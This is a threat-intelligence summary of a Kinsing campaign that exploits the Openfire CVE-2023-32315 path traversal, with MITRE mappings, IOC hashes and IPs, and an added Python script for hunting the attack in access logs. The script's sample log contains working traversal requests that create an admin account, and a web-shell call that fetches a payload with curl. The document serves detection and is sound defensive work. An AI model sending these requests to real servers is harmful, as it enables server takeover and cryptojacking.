Openfire CVE-2023-32315 is being exploited to deploy Kinsing malware and a cryptominer via a path traversal attack that grants unauthenticated access to the setup environment. Aqua Nautilus observed a campaign with a high attack volume (over 1,000 attacks in under two months) and details how attackers gain admin access, upload plugins, and deploy payloads. #Kinsing #Openfire #CVE-2023-32315 #Monero #Metasploit #AquaPlatform
Keypoints
- Attackers exploit CVE-2023-32315 in Openfire to perform a path traversal that exposes the setup environment to an unauthenticated user.
- The vulnerability enables creating a new admin user and uploading malicious plugins, giving attackers full server control.
- The uploaded plugin carries a backdoor (cmd.jsp) that allows command execution and file downloads on the server.
- Persistence is achieved via a secondary payload that creates a cronjob and disrupts competing attacks.
- The campaign includes broad C2 communication and download activity, culminating in the deployment of the Kinsing malware and a Monero cryptominer.
- Shodan-based survey showed thousands of Openfire instances exposed worldwide, with hundreds vulnerable, and a honeypot confirmed ongoing targeted activity (mostly Kinsing).
MITRE Techniques
- [T1190] Exploit Public-Facing Application - The attacker exploits the Openfire CVE-2023-32315 path traversal to access the setup environment. "This vulnerability leads to a path traversal attack, which grants an unauthenticated user access to the Openfire setup environment."
- [T1136] Create Account - The attacker can create a new admin user with elevated permissions. "This then allows the threat actor to create a new admin user and upload malicious plugins."
- [T1505.003] Web Shell - A backdoor in the uploaded plugin (cmd.jsp) enables downloading files and executing commands on the server. "This plugin contains a Java class named cmd.jsp that is a backdoor which enables downloading files and executing commands on the server."
- [T1053.005] Cron - The secondary payload creates a cronjob for persistence on the server. "This script creates a cronjob and deletes competition, so it's designed to make persistence on the server."
- [T1071.001] Web Protocols - The malware communicates with a C2 server over web protocols. "Next a broad communication between the C2 server and the malware…"
- [T1496] Resource Hijacking - The Monero cryptominer is downloaded and run on the compromised container. "The file kdevtmpfsi (a Monero cryptominer) is downloaded into the container."
Indicators of Compromise
- [File] - Kinsing binary and cryptominer payloads detected via multiple SHA256 hashes; e.g., 0a28885748fcd4a9709e829bfec4718756c01b0cc498d61e8936fddf1f0b0203, 32acdf28ddcdcfe360f04235501189204424e46e091738cc757c970c9dd4e98e
- [IP Addresses] - Attacker IPs observed in the campaign; e.g., 109.237.96.251, 109.237.96.124
- [IP Addresses] - Additional attacker/compromised-host addresses shown in the IOCs; e.g., 5.35.101.62, 103.164.138.183, 51.222.154.100, 65.21.151.9
- [File] - Malicious plugins (JARs) used in the attack; e.g., Kinsing Plugin with SHA256 871e3151d736b7402efdab403eb4e44d50544161814da9a348df9debd3e4ebf3, Metasploit Plugin SHA256 3d43218f0e503e9ebc63eff76df7a63ab20a0e9dc971fa70df8bb6f521ae1794
- [File] - Additional plugin and backdoor components (e.g., Backdoor Plugin SHA256 4cc22c8064c713466edfb1fb367c1c7e166014a67e4db1a308c92a012dd2827a)
- [IP Addresses] - Malware hosting server: 185.154.53.140
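The MITRE techniques and IOCs above can be turned into a simple hunt over Openfire admin-console access logs: flag dot-dot traversal into /setup/ (T1190), traversal that lands on the user-creation page (T1136), plugin uploads, any hit on a cmd.jsp served from a deployed plugin (T1505.003), and requests from the IPs listed in the IOCs. This is an added example, not code from the Aqua Nautilus post or from Openfire. It assumes combined-log-format access logs, that the admin console serves the setup environment under /setup/, plugin uploads via /plugin-admin.jsp and plugin JSPs under /plugins/<name>/, and that attackers hide the traversal behind URL encodings such as %2e, %u002e and "..;"; those encodings are assumed from how this class of bug is usually hit, not taken from the page. The log lines are constructed.

```python
"""Hunt for the Openfire CVE-2023-32315 attack chain in HTTP access logs.

Added example (not from the Aqua Nautilus post). Assumptions not stated on
the page: combined log format, setup environment under /setup/, plugin
uploads via /plugin-admin.jsp, plugin JSPs under /plugins/<name>/, and
traversal hidden behind %2e / %u002e / '..;' encodings.
"""
import re
from urllib.parse import unquote

# IP addresses taken from the page's IOC list.
IOC_IPS = {
    "109.237.96.251", "109.237.96.124", "5.35.101.62", "103.164.138.183",
    "51.222.154.100", "65.21.151.9", "185.154.53.140",
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log; the first three lines model one attacker's chain
# from an IOC IP, the last line a traversal probe from an unlisted IP.
LOG_LINES = """\
109.237.96.251 - - [10/Jul/2023:12:00:01 +0000] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?username=evil&isadmin=on HTTP/1.1" 200 1234
109.237.96.251 - - [10/Jul/2023:12:00:05 +0000] "POST /plugin-admin.jsp?uploadplugin HTTP/1.1" 200 512
109.237.96.251 - - [10/Jul/2023:12:00:09 +0000] "GET /plugins/kinsing/cmd.jsp?cmd=curl+http://x/kinsing HTTP/1.1" 200 88
203.0.113.7 - - [10/Jul/2023:12:01:00 +0000] "GET /login.jsp HTTP/1.1" 200 4021
198.51.100.9 - - [10/Jul/2023:12:02:00 +0000] "GET /setup/setup-s/..;/..;/log.jsp HTTP/1.1" 200 900
"""


def normalize_path(raw):
    """Strip the query string and undo the encodings used to hide '..'."""
    p = raw.split("?", 1)[0]
    # %uXXXX (non-standard unicode escape) -> the character itself, e.g. %u002e -> '.'
    p = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), p)
    for _ in range(3):          # unwind double/triple percent-encoding
        p = unquote(p)
    p = p.replace("..;", "..")  # servlet-container ';' path-parameter trick
    return p.lower()


def analyze(line):
    """Return {'ip', 'path', 'tags'} for one log line, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method = m["ip"], m["method"]
    path = normalize_path(m["path"])
    segs = path.split("/")
    tags = []
    if path.startswith("/setup/") and ".." in segs:
        tags.append("T1190")            # traversal into the setup environment
        if segs[-1] == "user-create.jsp":
            tags.append("T1136")        # admin-account creation via the traversal
    if method == "POST" and segs[-1] == "plugin-admin.jsp":
        tags.append("plugin-upload")    # plugin upload (precedes the web shell)
    if len(segs) >= 4 and segs[1] == "plugins" and segs[-1] == "cmd.jsp":
        tags.append("T1505.003")        # cmd.jsp web shell inside a deployed plugin
    if ip in IOC_IPS:
        tags.append("IOC-IP")
    return {"ip": ip, "path": path, "tags": tags}


def hunt(log_text):
    """Return the analyses of all lines that raised at least one tag."""
    hits = []
    for line in log_text.splitlines():
        r = analyze(line)
        if r and r["tags"]:
            hits.append(r)
    return hits


if __name__ == "__main__":
    for h in hunt(LOG_LINES):
        print(h["ip"], h["path"], ",".join(h["tags"]))
```

Run against real logs by feeding the file contents to hunt(); a single IP that produces T1190 followed by plugin-upload and T1505.003 within minutes is the sequence the post describes, and a T1190 hit from an unlisted IP (the last sample line) is still worth triage, since the IOC list only covers the campaign Aqua observed.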
Read more: https://blog.aquasec.com/kinsing-malware-exploits-novel-openfire-vulnerability